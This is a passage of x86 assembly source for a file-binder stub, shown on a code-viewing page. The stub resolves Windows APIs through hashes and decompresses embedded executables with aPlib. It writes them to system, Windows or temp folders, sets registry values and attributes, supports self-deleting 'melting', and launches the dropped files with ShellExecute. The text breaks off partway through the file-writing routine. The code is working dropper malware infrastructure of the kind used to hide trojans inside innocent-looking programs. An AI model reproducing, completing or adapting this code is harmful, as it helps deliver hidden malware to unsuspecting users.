📄 stub.asm
字号:
; ----------------------------------------
;
; (C) Alex Demchenko (coban2k@mail.ru)
; http://www.cobans.net
;
; ----------------------------------------
; #########################################################################
; Stub size: 1536 bytes
; Assembler: MASM32
; Linker: MS Incremental Linker 5.12.8078 (FIXED)
; There are some offsets that should be fixed from GUI (thay are commented
; somewhere below). These jump offsets should be written in STUB_FIX1
; and STUB_FIX2 accordingly.
; "EncodeToDb" util is used to encode exe files into masm .inc files, which can
; be stored in the GUI's .data section
; "ProcGen" util is used to generate function hashes
; Thanks to
; LSD team for hash function
; Sars for kernel32 hModule search method (after some optimizations, this
; method weights less then LSD's PEB scanning :)
; Iczelion for great asm manuals and PE tutorials
; #########################################################################
.386
.model flat, stdcall
option casemap :none ; case sensitive
; #########################################################################
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
.data?
; Global Buffers (do not change order)
lpBuf db 512 dup(?) ; Common buffer
lpSelfPath db 512 dup(?) ; Path of current executable
lpMeltSrc db 512 dup(?) ; Melting source buffer
lpAltArgs db 512 dup(?) ; Alternative arguments (melting)
lpPath db 512 dup(?) ; Directory to run from
.data
szKernel db "kernel32",0
szUser db "user32",0
szShell db "shell32",0
szAdvApi db "advapi32",0
dwFuncs dd 045744193h ; ShellExecuteA
dd 0c0d6d616h ; CloseHandle
dd 0e6ff2cb9h ; ExitProcess
dd 038c62a7ah ; CreateFileA
dd 01475bb1ah ; GetSystemDirectoryA
dd 08aaff1bbh ; GetTempFileNameA
dd 0b929dc95h ; GetTempPathA
dd 01259ad09h ; GetWindowsDirectoryA
dd 0c2f6d009h ; GlobalAlloc
dd 058d8c545h ; WriteFile
dd 049462a7bh ; DeleteFileA
dd 060f43f1bh ; GetModuleFileNameA
dd 0789f5271h ; wsprintfA
dd 006eb9d6ah ; CreateDirectoryA
dd 0d24e569ah ; GetCurrentDirectoryA
dd 0a718d938h ; RegCreateKeyA
dd 09775a748h ; RegSetValueExA
dd offset CommonLoad
dd offset _lstrlen
dd offset _lstrcpyd
dd offset _lstrcpyd2
dd offset lpPath
dd "ssa*"
dd "lbme"
dd "or y"
dd "*xx"
dd offset getbit
szOpen db "open",0
.const
; Function offsets table
_ShellExecute equ dword ptr[ebp+4*0]
_CloseHandle equ dword ptr[ebp+4*1]
_ExitProcess equ dword ptr[ebp+4*2]
_CreateFile equ dword ptr[ebp+4*3]
_GetSystemDirectory equ dword ptr[ebp+4*4]
_GetTempFileName equ dword ptr[ebp+4*5]
_GetTempPath equ dword ptr[ebp+4*6]
_GetWindowsDirectory equ dword ptr[ebp+4*7]
_GlobalAlloc equ dword ptr[ebp+4*8]
_WriteFile equ dword ptr[ebp+4*9]
_DeleteFile equ dword ptr[ebp+4*10]
_GetModuleFileName equ dword ptr[ebp+4*11]
_wsprintf equ dword ptr[ebp+4*12]
_CreateDirectory equ dword ptr[ebp+4*13]
_GetCurrentDirectory equ dword ptr[ebp+4*14]
_RegCreateKey equ dword ptr[ebp+4*15]
_RegSetValueEx equ dword ptr[ebp+4*16]
_CommonLoad equ dword ptr[ebp+4*17]
__lstrlen equ dword ptr[ebp+4*18]
__lstrcpyd equ dword ptr[ebp+4*19]
__lstrcpyd2 equ dword ptr[ebp+4*20]
_lpPath equ dword ptr[ebp+4*21]
_lpMem equ dword ptr[ebp+4*22]
_esp equ dword ptr[ebp+4*23]
_ofsdir equ dword ptr[ebp+4*24]
_dwLen equ dword ptr[ebp+4*25]
_getbit equ dword ptr[ebp+4*26]
_szOpen equ dword ptr[ebp+4*27]
.code
; #########################################################################
; aPlib unpack
_aP_depack_asm:
pushad
mov edi, _lpMem
mov dl, 80h
literal:
movsb
mov dh, 2
nexttag:
call _getbit
jnc literal
xor ecx, ecx
call _getbit
jnc codepair
xor eax, eax
call _getbit
jnc shortmatch
mov dh, 2
inc ecx
mov al, 10h
getmorebits:
call _getbit
adc al, al
jnc getmorebits
jnz domatch
stosb
jmp short nexttag
codepair:
call getgamma_no_ecx
push edx
movzx edx, dh
sub ecx, edx
pop edx
jnz normalcodepair
call getgamma
jmp short domatch_lastpos
shortmatch:
lodsb
shr eax, 1
jz donedepacking
adc ecx, ecx
jmp short domatch_with_2inc
normalcodepair:
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call getgamma
cmp eax, 32000
jae domatch_with_2inc
cmp ah, 5
jae domatch_with_inc
cmp eax, 7fh
ja domatch_new_lastpos
domatch_with_2inc:
inc ecx
domatch_with_inc:
inc ecx
domatch_new_lastpos:
xchg eax, ebx
domatch_lastpos:
mov eax, ebx
mov dh, 1
domatch:
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short nexttag
getbit::
add dl, dl
jnz stillbitsleft
mov dl, [esi]
inc esi
adc dl, dl
stillbitsleft:
ret
getgamma:
xor ecx, ecx
getgamma_no_ecx:
inc ecx
getgammaloop:
call _getbit
adc ecx, ecx
call _getbit
jc getgammaloop
retn
donedepacking:
sub edi, _lpMem
mov [esp + 28], edi ; return unpacked length in eax
popad
retn
; Process each file (create, unpack, decrypt, write, execute)
Write proc uses esi
mov _esp, esp
mov byte ptr[ebx], 0
lodsd
xchg eax, edx
lodsd
push eax ; dwShellVis
push esi ; lpOfsArgs
call __lstrcpyd2 ; Decrypt
push esi ; szKey
call __lstrcpyd2 ; Decrypt
lodsd
push eax ; dwFileAttribs
push edx ; Param bit-mask
mov _ofsdir, esi ; Offset to custom directory
call __lstrcpyd2 ; Decrypt
push esi
@dir_again:
; Common params
push 500
push ebx
mov ecx, _GetTempPath
test dl, dl
jz @dir_temp
shr dl, 1
jc @dir_sys
shr dl, 1
jc @dir_win
shr dl, 1
jc @dir_cur
@dir_cust:
; Run from custom folder
pop edx
pop ecx ; = 500
mov esi, _ofsdir
call __lstrcpyd
jmp @F
@dir_win:
; Run from Windows folder
call _GetWindowsDirectory
jmp @F
@dir_sys:
; Run from System folder
call _GetSystemDirectory
jmp @F
@dir_cur:
; Run from Current folder
mov ecx, _GetCurrentDirectory
@dir_temp:
; Run from Temp folder
pop eax
pop edx
push eax
push edx
call ecx
@@:
; Check if directory is not empty
; and if it's empty (NULL) get windows directory
cmp byte ptr[ebx], 0
jnz @F
mov dl, 2
jmp @dir_again
@@:
mov edi, ebx
mov ecx, 500
; Copy Directory to lpPath
mov edx, _lpPath
mov esi, ebx
call __lstrcpyd
; Create temp or custom folder
; ----------------------------
; Windows can't create subfolders within unexistant parent
; folder (eg. C:\111\222\333) :(
@create_dir:
mov al, '\'
repne scasb
push ecx
mov byte ptr[edi-1], 0
push 0
push ebx
call _CreateDirectory
mov byte ptr[edi-1], '\'
pop ecx
test ecx, ecx
jnz @create_dir
push ebx
push ecx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -